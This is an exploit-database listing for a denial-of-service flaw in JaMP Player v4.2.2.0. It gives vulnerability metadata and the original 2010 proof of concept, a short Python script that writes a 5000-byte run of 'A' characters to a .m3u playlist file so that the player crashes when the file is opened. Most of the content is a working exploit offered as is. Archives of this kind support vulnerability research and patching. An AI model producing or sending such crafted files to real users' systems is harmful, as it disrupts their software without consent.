header-logo
Suggest Exploit
vendor:
Jamp Player
by:
Oh Yaw Theng
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Jamp Player
Affected Version From: v4.2.2.0
Affected Version To: v4.2.2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:jamp_player:jamp_player:4.2.2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 2
2010

JaMP Player v4.2.2.0 (.m3u) DoS

This exploit is for JaMP Player v4.2.2.0, which is vulnerable to a denial of service attack. The vulnerability is triggered when a specially crafted .m3u file is opened, causing the application to crash. No CVE has been assigned to this vulnerability.

Mitigation:

No mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: JaMP Player v4.2.2.0 (.m3u) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/jamp-player_2_219088.html?hl=&ia=0
# Version: v4.2.2.0
# Tested on: Windows XP SP 2
# CVE : N / A

#!/usr/bin/python

filename = "crash.m3u"

junk = "\x41" * 5000

exploit = junk

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()